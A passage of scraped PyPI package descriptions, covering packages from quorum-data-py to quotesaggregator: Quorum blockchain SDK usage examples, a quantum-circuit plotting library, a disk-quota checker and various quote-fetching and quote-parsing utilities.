\u5c01\u88c5\uff1a1\u3001feed\uff1a\u57fa\u4e8e quorum \u65b0\u5171\u8bc6\uff0c\u76ee\u524d\u88ab rum app\u3001feed\u3001port\u3001circle \u7b49\u51e0\u6b3e\u4ea7\u54c1\u91c7\u7528\u7684\u6570\u636e\u7ed3\u6784\u53c2\u8003\uff1ahttps://docs.rumsystem.net/docs/data-format-and-examples\u8bf7\u7559\u610f\uff0c\u8fd9\u53ea\u662f\u63a8\u8350\u7ed3\u6784\uff0c\u5e76\u4e0d\u662f\u552f\u4e00\u6807\u51c6\u3002quorum chain \u662f\u975e\u5e38\u5f00\u653e\u7684\uff0c\u5ba2\u6237\u7aef\u5b8c\u5168\u53ef\u4ee5\u6309\u7167\u81ea\u5df1\u7684\u9700\u6c42\u6765\u6784\u9020\u4e0a\u94fe\u6570\u636e\u7684\u7ed3\u6784\u30022\u3001converter\uff1a\u57fa\u4e8e quorum \u65b0\u5171\u8bc6\uff0c\u4ece\u65e7\u94fe trx \u6216\u4ece \u65b0\u94fe trx \u8f6c\u6362\u4e3a\u5f85\u53d1\u5e03\u7684\u6570\u636e\u3002\u76ee\u524d\u4e3b\u8981\u7528\u4f5c\u6570\u636e\u8fc1\u79fb\uff1a\u4ece\u65e7\u5171\u8bc6\u94fe\u8fc1\u79fb\u5230\u65b0\u5171\u8bc6\u94fe\uff1b\u5728\u65b0\u5171\u8bc6\u94fe\u4e4b\u95f4\u8fc1\u79fb\u30023\u3001trx_type\uff1a\u5224\u65ad trx \u7684\u7c7b\u578b\u3002\u8be5\u65b9\u6cd5\u6240\u8fd4\u56de\u7684\u7ed3\u679c\uff0c\u4e0e rum-app\uff0cfeed \u7b49\u4ea7\u54c1\u7684\u5904\u7406\u4fdd\u6301\u4e00\u81f4\u3002Installpipinstallquorum_data_pyExamplesfromquorum_data_pyimportfeed# create a new post datadata=feed.new_post(content='hello guys')# create a like post datadata=feed.like('a-post-id')\u9002\u7528\u4e8e fullnode \u4e5f\u9002\u7528\u4e8e lightnode\uff0c\u6bd4\u5982\uff1afromquorum_data_pyimportfeedfromquorum_fullnode_pyimportFullNodejwt=\"xxx\"url=\"xxx\"fullnode=FullNode(url,jwt)data=feed.new_post(content='hello 
guys')fullnode.api.post_content(data)fromquorum_data_pyimportfeedfromquorum_mininode_pyimportMiniNodeseed=\"xxx\"mininode=MiniNode(seed)data=feed.new_post(content='hello guys')mininode.api.post_content(data)Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum mininode sdk for python:https://github.com/liujuanjuan1984/quorum-mininode-pyand more ...https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. A copy of the license is provided in theLICENSEfile."} +{"package": "quorum-eth-py", "pacakge-description": "quorum-eth-pythe eth blockchain of rum network"} +{"package": "quorum-fullnode-py", "pacakge-description": "quorum_fullnode_pyPython SDK for Quorum FullNode.More about QuoRum:https://rumsystem.net/https://github.com/rumsystem/quorumInstallpipinstallquorum_fullnode_pyUsagefromquorum_fullnode_pyimportFullNodeurl=\"http://127.0.0.1:11002\"jwt=\"eyJhbGciO...VCJ9.eyJhbGxvd0...pbiJ9.FeyMWvzweE...o66QZ735nsrU\"# connect to a quorum fullnode with api url and chain jwt_tokenclient=FullNode(api_base=url,jwt_token=jwt)# check node_status is online.client.api.node_info().get(\"node_status\")==\"NODE_ONLINE\"# create a group chain for testinfo=client.api.create_group(\"test_group\")client.group_id=info[\"group_id\"]# send a new post to the group chaindata={\"type\":\"Create\",\"object\":{\"type\":\"Note\",\"content\":\"nice to meet u!\",\"name\":\"hi\",\"id\":\"efb14f14-f849-4cf3-bcb6-c3598e857adb\",},}resp=client.api.post_content(data)# get trx from group chaintrx=client.api.trx(resp['trx_id'])# get content:trxs=client.api.get_content()Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum mininode sdk for python:https://github.com/liujuanjuan1984/quorum-mininode-pyand more ...https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. A copy of the license is provided in theLICENSEfile."} +{"package": "quorum-lightnode", "pacakge-description": "quorum lightnode for Pythoninstallpipinstall-Uquorum-lightnodeuse quorum-lightnodejoin group and get group seed from localexportPYTHONPATH=.\npythonexample/join_group.pysend postexportPYTHONPATH=.\npythonexample/send_post.py"} +{"package": "quorum-mininode-py", "pacakge-description": "QuoRum LightNode Python SDKPython SDK for Quorum LightNode, Without local storage.Another better choice isquorum-lightnode-py, with local storage.More about QuoRum:https://rumsystem.net/https://github.com/rumsystem/quorumInstallpipinstallquorum_mininode_pyUsagefromquorum_mininode_pyimportMiniNodeseed_url='rum://seed?v=1&e=0&n=0&c=apzmbMVtMy6J0sQKwhF...2MwHjpA2E'pvtkey=\"0xd4e9ddc19ec5b...d8c\"bot=MiniNode(seed_url,pvtkey)# post content to rum group chaindata={\"type\":\"Create\",\"object\":{\"type\":\"Note\",\"content\":\"Hello world! Hello quorum!\",\"id\":\"a1d92233-3801-4295-a3cd-0e594385acc6\",},}resp=bot.api.post_content(data)print(resp)# like a postdata={\"type\":\"Like\",\"object\":{\"type\":\"Note\",\"id\":\"a1d92233-3801-4295-a3cd-0e594385acc6\"},}resp=bot.api.post_content(data)print(resp)# get content from rum group chaintrxs=bot.api.get_content(num=2,reverse=True)print(trxs)Sourcequorum fullnode sdk for python:https://github.com/liujuanjuan1984/quorum-fullnode-pyquorum data module for python:https://github.com/liujuanjuan1984/quorum-data-pyand more..https://github.com/okdaodine/awesome-quorumLicenseThis work is released under theMITlicense. 
A copy of the license is provided in theLICENSEfile."} +{"package": "quorumtoolbox", "pacakge-description": "# Quorum Toolbox[![CircleCI](https://circleci.com/gh/chainstack/quorum-toolbox/tree/master.svg?style=svg&circle-token=c64e8d715eee5747f4ab9f9e0321dc558f3ec92f)](https://circleci.com/gh/chainstack/quorum-toolbox/tree/master)\n[![PyPI version](https://badge.fury.io/py/quorumtoolbox.svg)](https://badge.fury.io/py/quorumtoolbox)## DependenciesPython ^3.4[constellation v0.3.2](https://github.com/jpmorganchase/constellation) (constellation-node)[quorum v2.6.0](https://github.com/jpmorganchase/quorum) (geth,bootnode)[istanbul-tools v1.0.1](https://github.com/jpmorganchase/istanbul-tools) (istanbul)## Installationpip install quorumtoolbox## DevelopmentClone repo, cd to quorum-toolbox and runpython setup.py develop.## Testingdocker-compose up"} +{"package": "quos", "pacakge-description": "Quos packageQuos package simplifies plotting and simulating a quantum computing circuit employing oscillatory qubits.To installpip install matplotlib\npip install pandas\npip install quosTo upgradepip install --upgrade quosRequired packagesmatplotlibpandasIncluded def functions ininit.py filePrimary (most usable) functionsqg(ssgqt): To create a plot of a quantum circuit based on a stringqb(ssgqt): To simulate a quantum circuit and plot Bloch spheres based on a stringSecondary (occasionally usable) functionsqh(): To show html file of list of quantum gates included hereqx(): To download quos.xlsm and qblo.xlsm filesqs(xlsm='quos.xlsm', wsht='Gates'): To generate a string for a quantum circuitHelper (internally used) functionsqn(nstr, tint=True): To create a number-type string into an integer or a floatqa(sn0r, sn0i, sn1r, sn1i): To convert qubit state numbers into qubit state anglesqp(sn0r, sn0i, sn1r, sn1i): To convert qubit state numbers into qubit state probabilitiesqm(xS, sn0r, sn0i, sn1r, sn1i): To multiply a matrix and a vector to generate a vectorIncluded gates in plots and simulationsQubits0: qubit in state 01: Qubit in state 1Q: Qubit in an arbitrary state specified by two angle argumentsIndividual gates without any argumentI: IdentityH: HadamardX: (Pauli) X gateY: (Pauli) Y gateZ: (Pauli) Z gateS: S (sqrt Z) phaseT: T (Pi/8 phase gate)V: V (sqrt X) phaseIndividual gates with one angle argumentRx: Rotation around XRy: Rotation around YRz: Rotation around ZPh: Global phase gatePp: Phase gate for second stateIndividual gates with three angle argumentsU: Universal rotation around arbitrary axisInteractive gatesC: Controls another gate: Needs affected gateCd: Reverse-controls another gate: Needs affected gateSw: Swaps with another gate: Needs connected SwiSw: Imaginary swaps with another gate: Needs connected iSwMeasurement related gatesM: Measurement gateThese gates can work for qudits after some modifications.Example string to represemt a quantum circuittxt = '1,3,0|Q 30 60,5,0|H,a,1|Y,1,2|Z,2,2|X,3,2|Y,4,2|Z,5,2|X,6,2|S,2,3|T,4,3|V,6,3|'\ntxt = txt + 'Rx 30,1,4|Ry 15,2,4|Rz 15,3,4|Rz 30,4,4|Ry 15,5,4|Rx 15,6,4|'\ntxt = txt + 'Ph 15,2,5|Pp 30,4,5|C,2,6,C,5,6,X,3,6|Cd,1,7,Ph 15,2,7|U 30 30 15,4,7|'\ntxt = txt + 'U 15 15 30,6,7|C,1,8,X,2,8|Sw,4,8,Sw,6,8|iSw,3,9,iSw,4,9|M,a,10'1 (qubit 1) on qubit 3 at time 0Q 30 60 (qubit with angles 30 60) on qubit 5 at time 00 (qubit 0) on other qubits at time 0H (Hadamard gate) on all qubits at time 1Y (Pauli Y gate) on qubit 1 at time 2 ...S (S gate) on qubit 2 at time 3 ...Rx 30 (rotation by 30 around X) on qubit 1 at time 4 ...Ph 15 (global phase gate by 15) on 
qubit 2 at time 5Pp 30 (phase gate for second state by 30) on qubit 4 at time 5C (control points) on qubits 2 and 5 at time 6 controlling X on qubit 3Cd (reverse control point) on qubit 1 at time 7 controlling Ph 15 on qubit 2U 30 30 15 (rotation by 30 30 15 around X Y Z) on qubit 4 at time 7 ...C (control point) on qubit 1 at time 8 controlling X on qubit 2Sw (swap) on qubits 4 and 6 at time 8iSw (imaginary swap) on qubits 3 and 4 at time 9M (measurement gate) on all qubits at time 10Example codes using this packageimport quos\n\n# To show html file of list of quantum gates included here\nquos.qh()\n# To download quos.xlsm and qblo.xlsm files\nquos.qx()\n# To generate a string for a quantum circuit\ntxt = quos.qs(xlsm=, wsht=)\n\n# To create a plot of a quantum circuit based on a string\nqg(txt)\n\n#To simulate a quantum circuit and plot Bloch spheres based on a string\nqb(ssgqt):Version History0.0.1 2023-11-07 Initial release0.0.2 2023-11-07 Minor corrections0.0.3 2023-11-07 Minor corrections0.0.4 2023-11-07 Minor corrections0.0.5 2023-11-09 Removed dependancy on networkx package0.0.6 2023-11-09 Enabled plotting of CNOT gate0.0.7 2023-11-10 Enabled arguments and plotting of qubits0.0.8 2023-11-14 Enabled several other gates0.0.9 2023-11-15 Enabled measurement gates0.0.10 2023-11-16 Enabled Excel file output0.0.11 2023-11-20 Enabled simulation in Excel file0.0.12 2023-11-29 Enabled simulation and Bloch spheres0.0.13 2023-12-02 Improved simulation and Bloch spheres0.0.14 2023-12-05 Improved simulation and Excel files0.0.15 2023-12-06 Enabled Toffoli gates0.0.16 2023-12-11 Improved Bloch sphere representations"} +{"package": "quotachecker", "pacakge-description": "This program returns the quota of 1st level sub directories in a directory using theducommand (available on all *nix platforms).UsageIf no start directory is given all directories in the current one will be checked by default:$ qcheck\n./directory-0 4\n./directory-1 920\n...\n./directory-9 8248\n. 41264Choose directoriesSometimes it is required to get the quota of a defined subset of directories.It is possible to give folder names as arguments:$ qcheck directory-1 directory-2\n./directory-1 920\n./directory-2 120This method only make sense for a couple of directories. A greater folder list can be given by a text file. The folder names should? be written line by line in the text file. To use it give the option-tand than the filename like this:$ qcheck -t folder_set.txtIf the folder doesn\u2019t exist a \u201cDoesentExistException\u201d will show you that for every missing Folder.OutputBy default the result is written to the standard output in bit-format.Each directory-quota will be presented in one line:$ qcheck\n./directory-0 4\n./directory-1 920\n...\n./directory-9 8248\n. 41264The output can also converted to a human readable form with the-roption:$ qcheck -r\n./directory-0 4,0K\n./directory-1 920K\n...\n./directory-9 8,1M\n. 41Mfile-outputIf the file output is enabled with the option-fFILENAMEthe output will be written to a csv-file. The file will be created if it does not exists.If thefilealready exists, the new content will be saved as a new column in the document. 
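That column-per-run behaviour is easy to picture with a short sketch. The snippet below is illustrative only, not quotachecker's own implementation; the use of du via subprocess and of pandas for the CSV handling is an assumption made for this example. It reads the existing CSV, asks du for each directory's size, and appends one new column for the current run.
import datetime
import subprocess
import pandas as pd

def du_size(directory):
    # `du -s <dir>` prints "<size>\t<dir>"; keep only the size field
    result = subprocess.run(["du", "-s", directory],
                            capture_output=True, text=True, check=True)
    return result.stdout.split()[0]

def append_quota_column(csv_path, directories):
    # column name follows the year-month pattern shown in the CSV example below
    column = datetime.date.today().strftime("%Y-%m")
    table = pd.read_csv(csv_path, sep=";", index_col="directorys")
    # assumes the CSV rows and the given directories are the same set, in order
    table[column] = [du_size(d) for d in directories]
    table.to_csv(csv_path, sep=";")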
The name of the column contains the date likeYY-MM:Example CSV outputdirectorys;2011-12;2012-03directory-1;0K;128Kdirectory-2;32M;132Mdirectory-3;980M;1.124GIf thecolumnalready exists the quotachecker will return a note that you have to set the-oparameter if you want to overwrite the column and exit.\nIf the-ooption is set quotachecker will overwrite the column by if it exist.RequirementsIf the installed python is at least 2.7 you have all what you need and there is nothing to install.If the installed python is 2.6 you need to installargparsewitch is already done if you installed the quotachecker with pip.TestingIf something doesn\u2019t work as described please first run the tests:python runtests.pyad send me me the output if it fails.Changelog1.7 (2012-05-09)Initial release"} +{"package": "quota-notifier", "pacakge-description": "Storage Quota NotifierA command line utility for emailing users when they exceed storage quota thresholds on mounted file systems.See theofficial documentationfor more details."} +{"package": "quotation", "pacakge-description": "No description available on PyPI."} +{"package": "quota-tracker", "pacakge-description": "quota-trackerQuotaTracker package"} +{"package": "quote", "pacakge-description": "Aboutquoteis a python wrapper for the Goodreads Quote API, powered bygazpacho.Quickstartquoteis simple to use:fromquoteimportquotesearch='Jasper Fforde'result=quote(search,limit=2)print(result)# [{'author': 'Jasper Fforde',# 'book': 'Something Rotten',# 'quote': 'If the real world were a book, it would never find a publisher. Overlong, detailed to the point of distraction-and ultimately, without a major resolution.'},# {'author': 'Jasper Fforde',# 'book': 'The Well of Lost Plots',# 'quote': \"After all, reading is arguably a far more creative and imaginative process than writing; when the reader creates emotion in their head, or the colors of the sky during the setting sun, or the smell of a warm summer's breeze on their face, they should reserve as much praise for themselves as they do for the writer - perhaps more.\"}]quotecan also be used as a command line tool:>>>max@mbp%quote'alain de botton'Peopleonlygetreallyinterestingwhentheystarttorattlethebarsoftheircages.\n\n>>>max@mbp%quote--search='alain de botton'Intimacyisthecapacitytoberatherweirdwithsomeone-andfindingthatthat'sokwiththem.Installpip install -U quoteContributeFor feature requests or bug reports, please useGithub Issues"} +{"package": "quote4py", "pacakge-description": "No description available on PyPI."} +{"package": "quoteBot", "pacakge-description": "this package will allow you to quickly make a twitter bot that tweets\nquotes with options for image generation of said quote.\n.inspired heavily by my previous creations,@Baudrillard_Botand@TOUGHLOVEBOT.WORK IN PROGRESS"} +{"package": "quoted", "pacakge-description": "quotedFeed your brain with the best random quotes from multiple web portals.FeaturesMultiple WEB sourcesCacheRich TextArgument optionsLogsRequirementsgit\npython 3x\npoetryInstallationLinux/MacOS$ pip install quotedWindowsUsage$ quoted\n\n\u201cInsanity is doing the same thing, over and over again, but expecting different results.\u201d\n\u2015\u2015 Narcotics Anonymous\n\ntags: humor, insanity, life, misattributed-ben-franklin, misattributed-mark-twain, misattributed-to-einstein\nlink: https://www.goodreads.com/quotes/5543-insanity-is-doing-the-same-thing-over-and-over-again\n\n\u00a9 goodreads\n\nPowered by quotedDevelopmentRun$ poetry install\n$ poetry run quotedBuild$ poetry buildThe 
distribution packages are located indistdirectory.Publish$ poetry publishSpidersSpider output is a list of dicts with the structure:[\n {\n 'author': 'Author Name',\n 'text': 'Text of Quote',\n 'tags': ['tag1','tag2'],\n 'url': 'https://www.quotesource.com/linktoquote'\n }\n]TodoSupportsbashandzshOutput formatsTags filerSite SelectorContributionFile bugs, feature requests inGitHub Issues."} +{"package": "quote-depencives", "pacakge-description": "No description available on PyPI."} +{"package": "quotee", "pacakge-description": "QuoteeSmall App To getQuotesdepend onZenquotes ApiQuotee Usagefromquotee.randomimportQuoteeexample=Quotee()quote=example.quoteauthor=example.authorprint(quote)print(author)"} +{"package": "quote-Extract", "pacakge-description": "Welcome to Quote_ExtractThis is a simple package aimed at providing motivational Quotes. You can used this Qoutes for business, Websites, For Blogging\u2026etc. This package uses an API to make quote requests from a website and return them to you as a text.How it worksAfter installing it. import it in your programimport quote_ExtractIt has 3 main functions quote(), author(), quote_author()-quote() returns the quote only\n-author() just the authors name\n-quote_author() both the quote and authors nameBE MOTIVATED USING QUOTES"} +{"package": "quotefancy", "pacakge-description": "QuotefancyYou can use to this Package to get random quotes as Text or Images. You can Download Quote too!Install it aspip install quotefancyUsage Guidefrom quotefancy import get_quote\n\n# Downloading quote as Image\nget_quote(type='img', download=True)\n\n# Getting as Text\nprint(get_quote(type='text'))CopyrightNew-Dev"} +{"package": "quotefix", "pacakge-description": "UNKNOWN"} +{"package": "quotegen", "pacakge-description": "This is a random quote generator library function.Change log0.0.1 (08/07/23)First Release"} +{"package": "quote-generator-0216", "pacakge-description": "No description available on PyPI."} +{"package": "quotehub", "pacakge-description": "#quotehub is a python package that provides you with random quotes\n#how to use:import quotehub\n\nquotes = quotehub.all()\nprint(quotes)#the above instance gives you access to all the quotes\n#you can specifie a particular persons quote like bill gates or mark zuckerberg.import quotehub\n\nquotes = quotehub.mark() #for mark zuckerbergs quotes\nprint(quotes)#or\nfrom quotehub import mark, bill, elun, hackers #etcquotes = bill()\nprint(quotes)#list of all the methods you can use are\nquotehub.all()\nquotehub.mark()\nquotehub.jobs()\nquotehub.bill()\nquotehub.elun()\nquotehub.tesla()\nquotehub.einstein()\nquotehub.science()\nquotehub.hackers()\nquotehub.success()#never the less just print\nimport quotehubprint(dir(quotehub)) to get all the method you can use#the only dependency this package need is the random module, but you don't need to install it in your program it comes pre-installed.#please note that this project is open source and open for collaboration, lets grow this quote project.#visit our github repo fork the repo, git clone on your local pc and send a pull request to us, we\n#will review it and add it to the package\n#and don't forget to add a readme file or our doc#github repohttps://github.com/cyber-maphian/quote-hub.git"} +{"package": "quote-lines", "pacakge-description": "quoteA tiny CLI used for quoting input linesExampleConsider the directory:$find.\n.\n./c\n./abHere,xargsalone will fail if we do:find . 
-type f | xargs catwith:This file is named: c\ncat: ./a: No such file or directory\ncat: b: No such file or directoryThis is because the file 'a b' is not quoted!Instead we can do:find . -type f | quote | xargs catand we will get:This file is named: c\nThis file is named: a b"} +{"package": "quote-maker", "pacakge-description": "Quote MakerJust another python script to automate boring stuff. Quote maker easy to create a quoted image and publish to a Facebook page.Depended Python libstextwrapPILInstall by \"pip3 install --upgrade -r requirements.txt\" or \"conan install --file requirements.txt\"Depended libs* curl 7.52.1 (x86_64-pc-linux-gnu) \n* libcurl/7.52.1 \n* OpenSSL/1.0.2l \n* zlib/1.2.8Runrun the script by$:python3.6 main.py\n****************************************************************************************\n\u200b~~~ quote_maker.py ~~~\nquote: Infinite love is the only truth. Everything else is illusion. David IckeOutputPost to FacebookTo enable access of Facebook to publish, following variable has to be hardcoded to achieve.page_id- facebook page ID, information can obtain from the page about. if you want to post on the personal walljust hardcodepage_id= \"me\".facebook_token- facebook access token with publish_action enable. for more visitGraph API explorer:https://developers.facebook.com/tools/explorer/145634995501895/Please uncomment #os.system(command) in main.pyHow to change image size?image_size_ximage_size_yresponcible for image size.Note: background colour is random, but the fourground colour is always white."} +{"package": "quote-manager", "pacakge-description": "library.quote.managerHelper nlp library for handling non ascii quotes.Usagefromquote_managerimportQuotessentence=\u201cThat\u2019san\u2018magic\u2019shoe.\u201dquotes_sentence=Quotes(sentence)quotes_sentence.simplified>>\"That's an 'magic' shoe.'# do stuff here...transformed_sentence=transform(quotes_sentence.simplified)# ex. grammar correction: \"That's a 'magic' shoe.'quotes_sentence.requote_modified_string(transformed_sentence)>>\u201cThat\u2019sa\u2018magic\u2019shoe.\u201d"} +{"package": "quote-ondemand", "pacakge-description": "Random QuotesGet the random quote from the internet.Note: The quotes are fetched using publicly hosted API's. Any change to the Authentication/Authorization or Request/Response format can cause a failure.InstallationYou can install the package fromPyPI:python -m pip install quote-ondemandThequotesis supported on Python 3.x.How to useAs as console applicationpython -m pip install quote-ondemandAs an module in your project>>> import quote\n>>> quote.__version__\n'1.0.0'a\n\n>>> from quote import QuoteFactory\n>>> QuoteFactory.get_quote()\n\nThe entire history of software engineering is that of the rise in levels of abstraction.\n- Grady Booch"} +{"package": "quotequail", "pacakge-description": "A library that identifies quoted text in plain text and HTML email messages.\nquotequail has no mandatory dependencies, however using HTML methods require\nlibxml.(Interested in working on projects like this?Close.iois looking forgreat engineersto join our team)Introductionquotequail comes with the functions listed below which are documented in detail\nin quotequail\u2019s__init__.py.quote(text): Takes a plain text message as an argument, returns a list of\ntuples. The first argument of the tuple denotes whether the text should be\nexpanded by default. 
The second argument is the unmodified corresponding\ntext.quote_html(html): Likequote(), but takes an HTML message as an\nargument.unwrap(text): If the passed text is the text body of a forwarded message,\na reply, or contains quoted text, a dictionary is returned, containing the\ntype (reply/forward/quote), the text at the top/bottom of the wrapped\nmessage, any parsed headers, and the text of the wrapped message.unwrap_html(text): Likeunwrap(), but takes an HTML message as an\nargument.ExamplesIn[1]:importquotequailIn[2]:quotequail.quote(\"\"\"Hello world.\n\nOn 2012-10-16 at 17:02 , Someone wrote:\n\n> Some quoted text\n\"\"\")Out[2]:[(True,'Hello world.\\n\\nOn 2012-10-16 at 17:02 , Someone wrote:'),(False,'\\n> Some quoted text\\n')]In[3]:quotequail.unwrap(\"\"\"Hello\n\nBegin forwarded message:\n\n> From: \"Some One\" \n> Date: 1. August 2011 23:28:15 GMT-07:00\n> To: \"Other Person\" \n> Subject: AW: AW: Some subject\n>\n> Original text\n\nText bottom\n\"\"\"))Out[3]:{'date':'1. August 2011 23:28:15 GMT-07:00','from':'\"Some One\" ','subject':'AW: AW: Some subject','text':'Original text','text_bottom':'Text bottom','text_top':'Hello','to':'\"Other Person\" ','type':'forward'}"} +{"package": "quoter", "pacakge-description": "Usagefrom quoter import *\n\nprint single('this') # 'this'\nprint double('that') # \"that\"\nprint backticks('ls -l') # `ls -l`\nprint braces('curlycue') # {curlycue}\nprint braces('curlysue', padding=1)\n # { curlysue }Cute\u2026but way too simple to be useful, right? Read on!Let\u2019s try something more complicated, where the output has to be\nintelligently based on context. Here\u2019s a taste of quoting some HTML\ncontent:print html.p(\"A para\", \".focus\")\nprint html.img('.large', src='file.jpg')\nprint html.br()\nprint html.comment(\"content ends here\")Yields:

<p class='focus'>A para</p>
<img class='large' src='file.jpg'>
<br>
<!-- content ends here -->
\nThis goes well beyond \u201csimply wrapping some text with other text.\u201d The\noutput format varies widely, correctly interpreting CSS Selector-based\ncontrols, using void/self-closing elements where needed, and using\nspecialized markup such as the comment format when needed. The HTML quoter\nand its companion XML quoter are competitive in power and simplicity with\nbespoke markup-generating packages.(A similar generator for Markdown is also newly included, though it\u2019s a the\n\u201cdemonsration\u201d rather than \u201cuse in production code\u201d stage.)Finally,quoterprovides a drop-dead simple, highly functional,joinfunction:mylist = list(\"ABCD\")\nprint join(mylist)\nprint join(mylist, sep=\" | \", endcaps=braces)\nprint join(mylist, sep=\" | \", endcaps=braces.but(padding=1))\nprint and_join(mylist)\nprint and_join(mylist[:2])\nprint and_join(mylist[:3])\nprint and_join(mylist, quoter=double, lastsep=\" and \")Yields:A, B, C, D\n{A | B | C | D}\n{ A | B | C | D }\nA and B\nA, B, and C\nA, B, C, and D\n\"A\", \"B\", \"C\" and \"D\"Which shows a range of separators, separation styles (both Oxford and\nnon-Oxford commas), endcaps, padding, and individual item quoting. I daresay\nyou will not find a more flexible or configurablejoinfunctionanywhereelse, in any programming language, at any price.And if you like any particular style of formatting, make it your own:>>> my_join = join.but(sep=\" | \", endcaps=braces.but(padding=1))\n>>> print my_join(mylist)\n{ A | B | C | D }Now you have a convenient specialized formatter to your own specifications.Seethe rest of the story\nat Read the Docs."} +{"package": "quoteran", "pacakge-description": "quoteranGet random quotes in terminal.This project fetch theQuotable.io API.InstallYou can installQuoteranfrom PyPI:pipinstallquoteranTo get the last version:pipinstallgit+https:/github.com/UltiRequiem/quoteranIf you use Linux, you may need to install this with sudo to\nbe able to access the command throughout your system.UsagequoteranLicenseThis project is Licensed under theMITLicense.AlternativeI also developed this in Nodejs:UltiRequiem/ranmessThe version written in Nodejs is significantly faster,\nand it was even easier to develop and publish than this.Update: Thanks toPoetrynow it's just as easy\nto publish as an npm package, maybe a bit more."} +{"package": "quoter-model", "pacakge-description": "Quoter ModelThis repository is a packaged version of code using thequoter modelas a model for social information flow [1]. The model was further explored and this code was further developed by Tyson Pond [2,3].The quoter model offers an idealistic mechanism for how people communicate written information in online social contexts (i.e. tweets on Twitter or posts on Facebook). 
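Before the mechanism is spelled out in the next paragraph, a rough, self-contained sketch may help fix the idea. This is a toy illustration only, not the package's quoter_model code, and the vocabulary, segment length and probability value are invented for the example: with probability q the ego quotes a contiguous run of words from a random neighbour's past text, otherwise it draws fresh words from a vocabulary distribution.
import random

def next_words(neighbour_histories, q=0.5, n_words=5, vocabulary=None):
    # toy version of the copy-or-innovate step described below
    vocabulary = vocabulary or ["the", "a", "quick", "brown", "fox", "jumps"]
    if neighbour_histories and random.random() < q:
        source = random.choice(neighbour_histories)            # pick one neighbour's past text
        start = random.randrange(max(1, len(source) - n_words + 1))
        return source[start:start + n_words]                   # quote a contiguous segment
    return [random.choice(vocabulary) for _ in range(n_words)] # generate new text

histories = [["to", "be", "or", "not", "to", "be"],
             ["all", "the", "world", "is", "a", "stage"]]
print(next_words(histories, q=0.8))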
The model runs on a social network, where each node (user) takes turns generating a sequence of words by one of two mechanisms:(i) copying a segment of a random neighbor's past text with probability $q$(ii) randomly generating new text according to a vocabulary distribution.We can then apply thecross-entropy(an information-theoretic measure which satisfies temporal precedence, referred to ashxin the code) to quantify information flow between each pair of users text.Installation and usagepip install quoter-modelThis will appear in your list of installed packages asquoter-model, but included in a python script byimport quoter.The most relevant usage of this package, as shown in the examples, would be to run something likefrom quoter.quoter_model import quoter_model_simand then run that function with relevant arguments.Currently the simulation is dependent on theProcessEntropypackage which can have C-related install issues; a workaround for this (as detailed at that repo) is to first runpip install --no-dependencies ProcessEntropy\npip install numba numpy nltkAlternatively you can modify the source code insidequoter/quoter_modelto use the local version ofCrossEntropy.See the examples for ideas on experiments to run, parameters to vary in simulations, etc.Example networksInsidesrc/quoter/real_networksare many examples of real networks, along with a module for parsing them into an appropriate format, that can be used to run simulations on.These have been compiled from different sources and are intended only as a starting point; other networks could be found, for example, at the onlinenetwork repositoryorICON.An example usage of the real networks is calculating their so-callededge clustering coefficientinexamples/edge_clustering.py. Example simulations for different parameters of ER, BA, WS, SBM networks are also found in theexamples directory, which is initialised as a module and can therefore be called in scripts.Note also that the simulation currently only works with uniformly weighted networks. An extension would be to use edge weights either as non-uniform quoting probabilites, or once an ego has \"decided\" to quote, to choose from its predecessors preferentially based on the connecting weights.DocumentationThere are autogenerated html docs indocs/_build/html/index.html, produced by runningmake htmlinsidedocs/(the makefile itself being auto-generate by aftersphinx-quickstart).Many of the docstrings are produced using docify so may need double checking. The docs are also now available atreadthedocs, and this is configured to re-build every time the github repo is pushed to, however it does not seem to be hosting the same html as I get locally! If anyone knows how to solve this please let me know:)Common abbreviationsER = Erd\u0151s\u2013R\u00e9nyi random graphBA = Barab\u00e1si\u2013Albert random graphWS = Watts\u2013Strogatz (small-world) graphSBM = Stochastic Block ModelRequirementsWorks withPython 3.6+[Networkx 1.11] Initially ran on this; now on 3.1 but in case you have any issues this would be whySee therequirements.txtfile for further dependencies. 
Note that for some advanced use of thenetworkxpackage, which may be included withinquoter, it may be helpful to runpip install networkx[default]TODOMake sure all docstrings are in reST/sphinx formatAdd more helpful commentsMake documentation better and available online [crude version available online at quoter-model.readthedocs.io]Add more typing to function argsAdd verbose output to quoter_model_sim() [done, needs testing/improving]Better syncing between simulation and processing scripts in the examples [done]get_modularity is currently defined in multiple different files, giving redundanciesRepository structuredist/contains the distribution archives generated usingpython3 -m build, and are an alternative way of installing the package for local usedocs/contains the auto-generated docs, as previously mentionedsrc/contains the actual package. I'm not too sure why it needs to be two levels down, but seems to work in any casetests/contains future tests for the package. As you can see, it is currently emptyAll the files in the base directory (this one) are fairly self explanatory (except maybepyproject.toml- at least it wasn't to me before I compiled this package - it is wherepipgets its package metadata from).References[1] Bagrow, J. P., & Mitchell, L. (2018). The quoter model: A paradigmatic model of the social flow of written information.Chaos: An Interdisciplinary Journal of Nonlinear Science, 28(7), 075304.[2] Pond, T. C. (2020). Measuring and Modeling Information Flow on Social Networks (Doctoral dissertation, The University of Vermont and State Agricultural College).[3] Pond, T., Magsarjav, S., South, T., Mitchell, L., & Bagrow, J. P. (2020). Complex contagion features without social reinforcement in a model of social information flow.Entropy, 22(3), 265."} +{"package": "quoters", "pacakge-description": "quotersA python library that gives you beautiful quotes.To installpip install quotersDocumentationhttps://github.com/suman-kr/quoters"} +{"package": "quoterz", "pacakge-description": "This will hold very long_description from README."} +{"package": "quotes", "pacakge-description": "Small python package to read quote sets from csv files.Installationpip install quotesUsageGet a random quote:fromquotesimportrandomif__name__=='__main__':print(random())List of available persons:fromquotesimportpersonsif__name__=='__main__':print(persons())"} +{"package": "quotesaggregator", "pacakge-description": "QuotesAggregatorQuotesAggregator \u00e9 um programa agregador de cota\u00e7\u00f5es que armazena os valores instant\u00e2neos de v\u00e1rias moedas para criar e\nsalvar candles de 1, 5 e 10 minutos num banco de dados atrav\u00e9s da API da Poloniex.Gr\u00e1ficos gerados a partir do banco de dados:Como UtilizarPr\u00e9-requisitosDockerUtilizandodocker-composeupExecutando testes unit\u00e1rios# Na pasta raiz do projeto# Lembre-se de criar um virtual envpipinstall--no-cache-dir-rrequirements.txt\npytestCriando graficosClique aquiDecis\u00f5es de arquiteturaUso de websokets ao inv\u00e9s da HTTP APIPara manter a consist\u00eancia dos dados seria necess\u00e1rio fazer varias requisi\u00e7\u00f5es a 